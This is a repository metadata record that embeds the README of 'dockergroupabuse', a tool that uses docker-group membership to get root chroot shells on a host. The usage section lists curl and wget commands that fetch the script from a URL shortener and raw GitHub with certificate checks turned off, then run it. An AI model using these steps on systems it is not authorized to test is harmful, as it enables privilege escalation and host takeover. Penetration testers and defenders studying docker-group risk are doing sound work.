{"id":22111679,"url":"https://github.com/phx/dockergroupabuse","last_synced_at":"2025-08-17T22:17:00.506Z","repository":{"id":121578359,"uuid":"264485717","full_name":"phx/dockergroupabuse","owner":"phx","description":"Abuse the docker group by using images found locally to escalate privileges and get a root chroot on the host system.","archived":false,"fork":false,"pushed_at":"2020-05-23T15:30:32.000Z","size":9,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-06-06T02:42:52.778Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/phx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-05-16T17:06:36.000Z","updated_at":"2020-05-23T15:30:35.000Z","dependencies_parsed_at":null,"dependency_job_id":"998cdc80-fac4-49f5-9629-231176ac2350","html_url":"https://github.com/phx/dockergroupabuse","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/phx/dockergroupabuse","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phx%2Fdockergroupabuse","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phx%2Fdockergroupabuse/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phx%2Fdockergroupabuse/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phx%2Fdockergroupabuse/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/phx","download_url":"https://codeload.github.com/phx/dockergroupabuse/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phx%2Fdockergroupabuse/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":270914793,"owners_count":24667203,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-17T02:00:09.016Z","response_time":129,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-01T10:50:26.628Z","updated_at":"2025-08-17T22:17:00.480Z","avatar_url":"https://github.com/phx.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# dockergroupabuse\n\nThis interactive script allows you to abuse the `docker` group to get root shells from minimal images that are already stored locally on the Docker host system.\n\nThe script will allow you to choose from any local image currently installed.\n\nIf there are no images installed, and the host has Internet access to the DockerHub repository, it will pull [lphxl/kaliroot](https://hub.docker.com/r/lphxl/kaliroot),\nwhich gives you a root level chroot shell on the system, and when exiting the chroot, you have access to all Kali Linux repos and tools, while the host is accessible at `/host`.\n\nIf it can't connect to DockerHub, it will try to pull a number of popular base images from the registry that the docker daemon is currently attached to, and will create\na rootshell image from that image.\n\nThe script cleans up after itself by deleting the `Dockerfile` that it creates on the fly, as well as removing the container and image as soon as it exits the shell.\n\nIf necessary, you can change this functionality by simply editing the [`rootshell.sh`](rootshell.sh) script itself.\n\n## Usage\n\nCopy the contents of [`rootshell.sh`](rootshell.sh) to the clipboard and paste into `rootshell.sh` on the remote Docker host system.\n\nOr if you have Internet access on the remote host, run one of the following commands:\n\n- `curl -skLO https://tinyurl.com/rootshell`\n- `wget --no-check-certificate https://tinyurl.com/rootshell`\n- `curl -skLO https://raw.githubusercontent.com/phx/dockergroupabuse/master/rootshell.sh`\n- `wget --no-check-certificate https://raw.githubusercontent.com/phx/dockergroupabuse/master/rootshell.sh`\n\n### Remote Docker Host:\n\n```\nchmod +x rootshell.sh\n./rootshell.sh\n```\n\nFeel free to modify [`rootshell.sh`](rootshell.sh) as necessary, but this script has worked with all images and systems I have tested.\n\n### About `sh` vs `bash`\n\nI have defaulted to using `sh` instead of `bash` in the commands in order to be cross-compatible with Alpine-based minimal images and such.  Feel free to call `bash` from `sh` after getting the shell.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fphx%2Fdockergroupabuse","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fphx%2Fdockergroupabuse","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fphx%2Fdockergroupabuse/lists"}